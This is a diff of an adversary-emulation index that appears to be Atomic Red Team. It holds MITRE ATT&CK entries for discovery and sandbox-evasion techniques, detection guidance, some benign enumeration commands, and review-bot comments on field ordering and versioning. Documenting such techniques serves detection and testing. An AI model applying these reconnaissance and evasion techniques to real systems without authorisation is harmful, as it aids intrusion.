+ Normal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+
+ In cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be sufficient due to benign use during normal operations.
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
+ - Network protocol analysis
+ - Process use of network
+ x_mitre_version: '2.1'
identifier: T1135
atomic_tests:
- name: Network Share Discovery
@@ -36857,15 +37858,16 @@ discovery:
name: powershell
T1040:
technique:
- id: attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Network Sniffing
- description: |-
- Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
-
- Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.
-
- Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities.
+ created: '2017-05-31T21:30:41.399Z'
+ modified: '2020-03-25T21:03:49.610Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ type: attack-pattern
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1040
@@ -36873,16 +37875,15 @@ discovery:
- external_id: CAPEC-158
source_name: capec
url: https://capec.mitre.org/data/definitions/158.html
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- - kill_chain_name: mitre-attack
- phase_name: discovery
- modified: '2020-03-25T21:03:49.610Z'
- created: '2017-05-31T21:30:41.399Z'
+ description: |-
+ Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
+
+ Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.
+
+ Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities.
+ name: Network Sniffing
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529
x_mitre_version: '1.1'
x_mitre_data_sources:
- Network device logs
@@ -37010,25 +38011,25 @@ discovery:
phase_name: discovery
modified: '2020-03-26T17:17:42.457Z'
created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Sudhanshu Chauhan, @Sudhanshu_C
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: Monitor processes for tools and command line arguments that
may indicate they're being used for password policy discovery. Correlate that
activity with other suspicious activity from the originating system to reduce
potential false positives from valid user or administrator activity. Adversaries
will likely attempt to find the password policy early in an operation and
the activity is likely to happen with other Discovery activity.
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
- x_mitre_is_subtechnique: false
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ x_mitre_contributors:
+ - Sudhanshu Chauhan, @Sudhanshu_C
+ x_mitre_version: '1.1'
identifier: T1201
atomic_tests:
- name: Examine password complexity policy - Ubuntu
@@ -37127,6 +38128,12 @@ discovery:
name: bash
T1120:
technique:
+ created: '2017-05-31T21:31:28.471Z'
+ modified: '2020-03-26T17:42:03.337Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ type: attack-pattern
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
@@ -37145,35 +38152,40 @@ discovery:
name: Peripheral Device Discovery
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
id: attack-pattern--348f1eef-964b-4eb6-bb53-69b3dcb0c643
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- modified: '2020-03-26T17:42:03.337Z'
- created: '2017-05-31T21:31:28.471Z'
- x_mitre_is_subtechnique: false
+ x_mitre_version: '1.2'
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
+
+ Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - SYSTEM
+ x_mitre_platforms:
+ - Windows
+ - macOS
x_mitre_data_sources:
- PowerShell logs
- API monitoring
- Process monitoring
- Process command-line parameters
- x_mitre_platforms:
- - Windows
- - macOS
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
-
- Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_version: '1.2'
+ x_mitre_is_subtechnique: false
atomic_tests: []
T1069:
technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created: '2017-05-31T21:30:55.471Z'
+ modified: '2020-03-26T17:48:28.002Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ type: attack-pattern
+ id: attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Permission Groups Discovery
+ description: Adversaries may attempt to find group and permission settings.
+ This information can help adversaries determine which user accounts and groups
+ are available, the membership of users in particular groups, and which users
+ and groups have elevated permissions.
external_references:
- source_name: mitre-attack
external_id: T1069
@@ -37181,19 +38193,8 @@ discovery:
- external_id: CAPEC-576
source_name: capec
url: https://capec.mitre.org/data/definitions/576.html
- description: Adversaries may attempt to find group and permission settings.
- This information can help adversaries determine which user accounts and groups
- are available, the membership of users in particular groups, and which users
- and groups have elevated permissions.
- name: Permission Groups Discovery
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- modified: '2020-03-26T17:48:28.002Z'
- created: '2017-05-31T21:30:55.471Z'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_is_subtechnique: false
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
@@ -37245,26 +38246,26 @@ discovery:
phase_name: discovery
modified: '2020-03-26T18:05:53.130Z'
created: '2017-05-31T21:30:48.728Z'
- x_mitre_version: '1.2'
- x_mitre_data_sources:
- - API monitoring
- - Process monitoring
- - Process command-line parameters
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
-
- Normal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_is_subtechnique: false
+ x_mitre_system_requirements:
+ - Administrator, SYSTEM may provide better process ownership details
x_mitre_permissions_required:
- User
- Administrator
- SYSTEM
- x_mitre_system_requirements:
- - Administrator, SYSTEM may provide better process ownership details
- x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+
+ Normal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_data_sources:
+ - API monitoring
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_version: '1.2'
identifier: T1057
atomic_tests:
- name: Process Discovery - ps
@@ -37328,22 +38329,22 @@ discovery:
phase_name: discovery
modified: '2020-03-26T18:08:20.049Z'
created: '2017-05-31T21:30:25.584Z'
- x_mitre_version: '1.2'
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
-
- Interaction with the Windows Registry may come from the command line using utilities such as [Reg](https://attack.mitre.org/software/S0075) or through running malware that may interact with the Registry through an API. Command-line invocation of utilities used to query the Registry may be detected through process and command-line monitoring. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_data_sources:
- - Windows Registry
- - Process monitoring
- - Process command-line parameters
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
x_mitre_permissions_required:
- User
- Administrator
- SYSTEM
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_data_sources:
+ - Windows Registry
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+
+ Interaction with the Windows Registry may come from the command line using utilities such as [Reg](https://attack.mitre.org/software/S0075) or through running malware that may interact with the Registry through an API. Command-line invocation of utilities used to query the Registry may be detected through process and command-line monitoring. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_version: '1.2'
identifier: T1012
atomic_tests:
- name: Query Registry
@@ -37402,43 +38403,54 @@ discovery:
or /etc/hosts) in order to discover the hostname to IP address
mappings of remote systems. \n\nSpecific to macOS, the bonjour
protocol exists to discover additional Mac-based systems within the same broadcast
- domain. In cloud environments, many typical utilities may be used to discover
- remote systems depending upon the host operating system. In addition, cloud
- environments often provide APIs that serve information about remote systems
- and services."
+ domain.\n\nWithin IaaS (Infrastructure as a Service) environments, remote
+ systems include instances and virtual machines in various states, including
+ the running or stopped state. Cloud providers have created methods to serve
+ information about remote systems, such as APIs and CLIs. For example, AWS
+ provides a DescribeInstances API within the Amazon EC2 API and
+ a describe-instances command within the AWS CLI that can return
+ information about all instances within an account.(Citation: Amazon Describe
+ Instances API)(Citation: Amazon Describe Instances CLI) Similarly, GCP's Cloud
+ SDK CLI provides the gcloud compute instances list command to
+ list all Google Compute Engine instances in a project, and Azure's CLI az
+ vm list lists details of virtual machines.(Citation: Google Compute
+ Instances)(Citation: Azure VM List)"
external_references:
- source_name: mitre-attack
- url: https://attack.mitre.org/techniques/T1018
external_id: T1018
+ url: https://attack.mitre.org/techniques/T1018
- external_id: CAPEC-292
source_name: capec
url: https://capec.mitre.org/data/definitions/292.html
+ - source_name: Amazon Describe Instances API
+ url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
+ description: Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020.
+ - source_name: Amazon Describe Instances CLI
+ url: https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/describe-instances.html
+ description: Amazon. (n.d.). describe-instances. Retrieved May 26, 2020.
+ - source_name: Google Compute Instances
+ url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
+ description: Google. (n.d.). gcloud compute instances list. Retrieved May
+ 26, 2020.
+ - source_name: Azure VM List
+ url: https://docs.microsoft.com/en-us/cli/azure/vm?view=azure-cli-latest
+ description: Microsoft. (n.d.). az vm. Retrieved May 26, 2020.
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
- modified: '2020-03-26T18:13:00.634Z'
+ modified: '2020-05-26T15:02:19.656Z'
created: '2017-05-31T21:30:28.187Z'
- x_mitre_version: '2.1'
- x_mitre_data_sources:
- - Network protocol analysis
- - Process monitoring
- - Process use of network
- - Process command-line parameters
- x_mitre_detection: "System and network discovery techniques normally occur throughout
- an operation as an adversary learns the environment. Data and events should
- not be viewed in isolation, but as part of a chain of behavior that could
- lead to other activities, such as Lateral Movement, based on the information
- obtained.\n\nNormal, benign system and network events related to legitimate
- remote system discovery may be uncommon, depending on the environment and
- how they are used. Monitor processes and command-line arguments for actions
- that could be taken to gather system and network information. Remote access
- tools with built-in features may interact directly with the Windows API to
- gather information. Information may also be acquired through Windows system
- management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
- and [PowerShell](https://attack.mitre.org/techniques/T1059/001). "
+ x_mitre_is_subtechnique: false
+ x_mitre_contributors:
+ - Praetorian
+ - RedHuntLabs, @redhuntlabs
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - SYSTEM
x_mitre_platforms:
- Linux
- macOS
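Review bot: `x_mitre_version` is left at `'2.1'` (L95843, in the following hunk) even though this hunk rewrites the T1018 description, adds four citations and moves `modified` forward to 2020-05-26, and the next hunk adds three cloud data sources and a new detection paragraph; if this index is copied verbatim from the upstream STIX bundle that is whatever upstream shipped, but if the version field is derived locally it should be confirmed against upstream, since downstream tooling commonly keys "technique changed" on that field. The new description also carries `DescribeInstances`, `describe-instances`, `gcloud compute instances list` and `az vm list` as bare prose; upstream ATT&CK descriptions usually mark such identifiers up as code, so the generator may be stripping inline markup, which is worth confirming is intentional. Separately, nearly every other hunk in this file (for example the blocks ending at L95304 and L95336) is pure key-order churn that buries the two substantive T1018 hunks; emitting keys in a stable order from the generator would keep future diffs reviewable.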
@@ -37446,14 +38458,21 @@ discovery:
- GCP
- Azure
- AWS
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- x_mitre_contributors:
- - Praetorian
- - RedHuntLabs, @redhuntlabs
- x_mitre_is_subtechnique: false
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+
+ Normal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+
+ In cloud environments, the usage of particular commands or APIs to request information about remote systems may be common. Where possible, anomalous usage of these commands and APIs or the usage of these commands and APIs in conjunction with additional unexpected commands may be a sign of malicious use. Logging methods provided by cloud providers that capture history of CLI commands executed or API usage may be utilized for detection.
+ x_mitre_data_sources:
+ - Azure activity logs
+ - Stackdriver logs
+ - AWS CloudTrail logs
+ - Network protocol analysis
+ - Process monitoring
+ - Process use of network
+ - Process command-line parameters
+ x_mitre_version: '2.1'
identifier: T1018
atomic_tests:
- name: Remote System Discovery - net
@@ -37633,21 +38652,44 @@ discovery:
- source_name: mitre-attack
external_id: T1518.001
url: https://attack.mitre.org/techniques/T1518/001
+ - source_name: Expel IO Evil in AWS
+ url: https://expel.io/blog/finding-evil-in-aws/
+ description: Anthony Randazzo, Britton Manahan and Sam Lipton. (2020, April
+ 28). Finding Evil in AWS. Retrieved June 25, 2020.
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Security Software Discovery
description: |-
- Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+ Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Example commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), reg query with [Reg](https://attack.mitre.org/software/S0075), dir with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.
+
+ Adversaries may also utilize cloud APIs to discover the configurations of firewall rules within an environment.(Citation: Expel IO Evil in AWS)
id: attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
- modified: '2020-03-15T01:15:56.113Z'
+ modified: '2020-06-29T17:32:24.787Z'
created: '2020-02-21T21:16:18.066Z'
+ x_mitre_data_sources:
+ - Stackdriver logs
+ - Azure activity logs
+ - AWS CloudTrail logs
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained.
+
+ Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+
+ In cloud environments, additionally monitor logs for the usage of APIs that may be used to gather information about security software configurations within the environment.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- macOS
@@ -37658,18 +38700,6 @@ discovery:
- Office 365
- Azure AD
- SaaS
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained.
-
- Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_permissions_required:
- - User
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- - Process command-line parameters
identifier: T1518.001
atomic_tests:
- name: Security Software Discovery
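Review bot: The technique now lists cloud platforms (`AWS`, `GCP`, `Azure`, `Office 365`, `Azure AD`, `SaaS`) and its description adds discovery of firewall rules through cloud APIs, with CloudTrail/Stackdriver/Azure activity logs as data sources, yet the only atomic visible at the end of the hunk is the existing host-based `Security Software Discovery` test. If the remainder of the `atomic_tests` list (it continues past this hunk) holds no cloud-side test, the index advertises coverage it cannot exercise; a read-only enumeration such as `aws ec2 describe-security-groups` run under a test identity holding only `ec2:DescribeSecurityGroups` would let the new detection guidance about API logs be validated. Because `x_mitre_permissions_required` lists only `User`, such a test should be written so it does not need an administrative cloud role.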
@@ -37757,7 +38787,7 @@ discovery:
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Software Discovery
description: |-
- Adversaries may attempt to get a listing of software and software versions that are installed on a system. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+ Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
id: attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58
@@ -37765,8 +38795,24 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
- modified: '2020-03-26T18:56:04.855Z'
+ modified: '2020-06-29T19:34:39.136Z'
created: '2019-09-16T17:52:44.147Z'
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '1.1'
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained.
+
+ Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_data_sources:
+ - Stackdriver logs
+ - Azure activity logs
+ - AWS CloudTrail logs
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
x_mitre_platforms:
- Linux
- macOS
@@ -37777,19 +38823,6 @@ discovery:
- Office 365
- Azure AD
- SaaS
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - File monitoring
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained.
-
- Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_version: '1.1'
- x_mitre_is_subtechnique: false
identifier: T1518
atomic_tests:
- name: Find and Display Internet Explorer Browser Version
@@ -37817,11 +38850,108 @@ discovery:
Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize
Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize
name: powershell
- T1082:
+ T1497.001:
technique:
+ id: attack-pattern--29be378d-262d-4e99-b00d-852d573628e6
+ description: "Adversaries may employ various system checks to detect and avoid
+ virtualization and analysis environments. This may include changing behaviors
+ based on the results of checks for the presence of artifacts indicative of
+ a virtual machine environment (VME) or sandbox. If the adversary detects a
+ VME, they may alter their malware to disengage from the victim or conceal
+ the core functions of the implant. They may also search for VME artifacts
+ before dropping secondary or additional payloads. Adversaries may use the
+ information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)
+ during automated discovery to shape follow-on behaviors. \n\nSpecific checks
+ may will vary based on the target and/or adversary, but may involve behaviors
+ such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047),
+ [PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information
+ Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012)
+ to obtain system information and search for VME artifacts. Adversaries may
+ search for VME artifacts in memory, processes, file system, hardware, and/or
+ the Registry. Adversaries may use scripting to automate these checks into
+ one script and then have the program exit if it determines the system to be
+ a virtual environment. \n\nChecks could include generic system properties
+ such as uptime and samples of network traffic. Adversaries may also check
+ the network adapters addresses, CPU core count, and available memory/drive
+ size. \n\nOther common checks may enumerate services running that are unique
+ to these applications, installed programs on the system, manufacturer/product
+ fields for strings relating to virtual machine applications, and VME-specific
+ hardware/processor instructions.(Citation: McAfee Virtual Jan 2017) In applications
+ like VMWare, adversaries can also use a special I/O port to send commands
+ and receive output. \n \nHardware checks, such as the presence of the fan,
+ temperature, and audio devices, could also be used to gather evidence that
+ can be indicative a virtual environment. Adversaries may also query for specific
+ readings from these devices.(Citation: Unit 42 OilRig Sept 2018)"
+ name: System Checks
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
+ - source_name: mitre-attack
+ external_id: T1497.001
+ url: https://attack.mitre.org/techniques/T1497/001
+ - source_name: McAfee Virtual Jan 2017
+ url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
+ description: Roccia, T. (2017, January 19). Stopping Malware With a Fake Virtual
+ Machine. Retrieved April 17, 2019.
+ - url: https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie/
+ description: Falcone, R., et al. (2018, September 04). OilRig Targets a Middle
+ Eastern Government and Adds Evasion Techniques to OopsIE. Retrieved September
+ 24, 2018.
+ source_name: Unit 42 OilRig Sept 2018
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ modified: '2020-07-01T16:32:02.514Z'
+ created: '2020-03-06T20:57:37.959Z'
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ x_mitre_detection: Virtualization/sandbox related system checks will likely
+ occur in the first steps of an operation but may also occur throughout as
+ an adversary learns the environment. Data and events should not be viewed
+ in isolation, but as part of a chain of behavior that could lead to other
+ activities, such as lateral movement, based on the information obtained. Detecting
+ actions related to virtualization and sandbox identification may be difficult
+ depending on the adversary's implementation and monitoring required. Monitoring
+ for suspicious processes being spawned that gather a variety of system information
+ or perform other forms of Discovery, especially in a short period of time,
+ may aid in detection.
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_defense_bypassed:
+ - Static File Analysis
+ - Signature-based detection
+ - Host forensic analysis
+ - Anti-virus
+ atomic_tests: []
+ T1082:
+ technique:
+ created: '2017-05-31T21:31:04.307Z'
+ modified: '2020-03-26T18:17:42.298Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ type: attack-pattern
+ id: attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: System Information Discovery
+ description: |-
+ An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+
+ Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. A breakdown of system data can also be gathered through the macOS systemsetup command, but it requires administrative privileges.
+
+ Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API)
+ external_references:
- source_name: mitre-attack
external_id: T1082
url: https://attack.mitre.org/techniques/T1082
